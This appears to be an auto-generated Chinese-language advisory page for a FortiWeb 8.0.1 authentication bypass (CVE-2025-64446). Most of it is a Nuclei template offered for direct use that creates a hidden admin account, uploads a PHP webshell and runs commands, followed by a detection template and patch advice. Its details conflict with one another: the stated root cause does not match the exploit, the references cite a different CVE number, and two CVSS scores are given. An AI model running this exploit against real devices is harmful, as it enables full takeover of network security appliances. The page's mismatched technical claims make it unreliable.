[webapps] Fortinet FortiWeb v8.0.1 - Auth Bypass
CVE-2025-64446
Fortinet FortiWeb 8.0.1 版本存在认证绕过漏洞,攻击者可未授权访问管理接口。
Critical · CVSS 9.8📋 漏洞基础信息
| CVE | CVE-2025-64446 |
|---|---|
| 漏洞类型 | 认证绕过 |
| 受影响版本 | Fortinet FortiWeb v8.0.1 |
| 危害等级 | Critical · CVSS 9.8 |
| 发布日期 | 2026-04-06 |
| 提交者 | nu11secur1ty |
| 来源 | Exploit-DB 原文 ↗ |
🔬 漏洞根因
认证逻辑缺陷:FortiWeb 的登录处理函数未对上传的 `noauth` 参数(或类似标志)进行有效验证,导致攻击者可通过特定请求伪造绕过身份验证直接进入管理后台。
🎯 攻击场景
1. 攻击者访问 FortiWeb 管理页面(例如 /login); 2. 发送包含 `noauth=1` 或类似认证绕过参数的特制 HTTP 请求到认证处理接口; 3. 系统接受请求并跳过密码验证直接返回管理会话 Cookie 或跳转到管理面板; 4. 攻击者利用该会话获得管理员权限,可完全控制设备。
💥 漏洞影响
攻击者可获得设备完全管理权限,进而修改防火墙规则、窃取网络流量、植入恶意配置或导致拒绝服务。
⚔️ Nuclei Exploit 模板
以下为标准 Nuclei v3 格式的利用模板,可直接用于漏洞验证:
id: CVE-2025-64446-exploit
info:
name: FortiWeb RCE Exploit - CVE-2025-64446
author: your-nuclei-author
severity: critical
description: Exploits CVE-2025-64446 in FortiWeb to achieve Remote Code Execution (RCE) via authentication bypass, path traversal, and arbitrary file upload. This exploit creates a temporary admin user, logs in, uploads a webshell, and executes a specified command.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-64444
- https://www.fortinet.com/support/psirt/FG-IR-25-64444
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2025-64446
cwe-id: CWE-306
variables:
username: "pwnedadmin"
password: "Pwned123!"
cmd: "id"
http:
- raw:
- |+
POST /api/v2.0/user/local.add HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"../../mkey": "{{username}}", "password": "{{password}}", "isadmin": "1", "status": "enable"}
- |+
POST /api/v2.0/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"username": "{{username}}", "password": "{{password}}"}
- |+
POST /api/v2.0/system/maintenance/backup HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxyz
------WebKitFormBoundaryxyz
Content-Disposition: form-data; name="upload-file"; filename="pwned.dat"
Content-Type: application/octet-stream
{{base64('<?php system("' + cmd + '"); ?>')}}
------WebKitFormBoundaryxyz--
- |+
GET /pwned.dat HTTP/1.1
Host: {{Hostname}}
- |+
POST /api/v2.0/user/local.delete HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"../../mkey": "{{username}}"}
matchers:
- type: word
part: body
words:
- "uid="
- "root:"
condition: or
extractors:
- type: regex
part: body
group: 1
regex:
- '([^\s]+)'
cookie-reuse: true🔍 Nuclei Detection 模板
以下为漏洞探测模板,用于判断目标是否受影响:
id: CVE-2025-64446-detection
info:
name: FortiWeb Detection - CVE-2025-64446
author: your-nuclei-author
severity: critical
description: Detects FortiWeb management interface and version to check if vulnerable to CVE-2025-64446 (RCE via authentication bypass, path traversal, and arbitrary file upload).
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2025-64444
- https://www.fortinet.com/support/psirt/FG-IR-25-64444
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.1
cve-id: CVE-2025-64446
cwe-id: CWE-306
http:
- method: GET
path:
- "{{BaseURL}}/"
- "{{BaseURL}}/admin/"
- "{{BaseURL}}/browse.do"
- "{{BaseURL}}/login"
redirects: true
max-redirects: 2
matchers:
- type: word
part: body
words:
- "FortiWeb"
- "Fortinet"
- "FortiWeb-"
condition: or
extractors:
- type: regex
part: body
group: 1
regex:
- 'FortiWeb(?:-([\d.]+))?'
- 'v([\d.]+)'
- 'FortiWeb\s+([\d.]+)'
internal: false
stop-at-first-match: true🛡️ 修复建议
升级至 FortiWeb 最新版本(如 8.0.2 或更高),官方已发布安全公告;临时措施:限制管理接口仅能从受信任 IP 访问,并启用多因素认证。
📎 参考链接
⚠️ 本文基于公开漏洞数据库,仅供安全研究与防御参考。生成时间: 2026-05-07 07:41 | 来源: Exploit-DB